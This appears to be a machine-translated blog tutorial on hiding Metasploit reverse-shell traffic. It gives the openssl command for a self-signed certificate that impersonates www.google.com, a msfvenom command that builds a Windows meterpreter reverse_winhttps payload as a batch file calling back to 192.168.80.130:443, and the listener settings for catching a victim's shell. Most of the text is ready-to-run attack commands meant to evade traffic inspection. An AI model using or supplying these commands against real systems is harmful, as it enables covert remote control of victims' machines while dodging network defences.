当前位置：网站首页>[intranet penetration] MSF rebound traffic encryption session

[intranet penetration] MSF rebound traffic encryption session

2022-07-21 20:57:00 【3SS security front】

List of articles

msf Rebound traffic encryption session

msf Rebound traffic encryption session

Create certificate
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj “/C=UK/ST=London/L=London/O=Development/CN=www.google.com” \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt
Insert picture description here
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.80.130 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o pentestlab.bat

Two more options are required to configure the listener
set payload windows/meterpreter/reverse_winhttps
set LHOST 192.168.80.130
set LPORT 443
set HandlerSSLCert /home/sanss/www.google.com.pem
set StagerVerifySSLCert true
Insert picture description here
perform run

The victim machine performs a rebound shell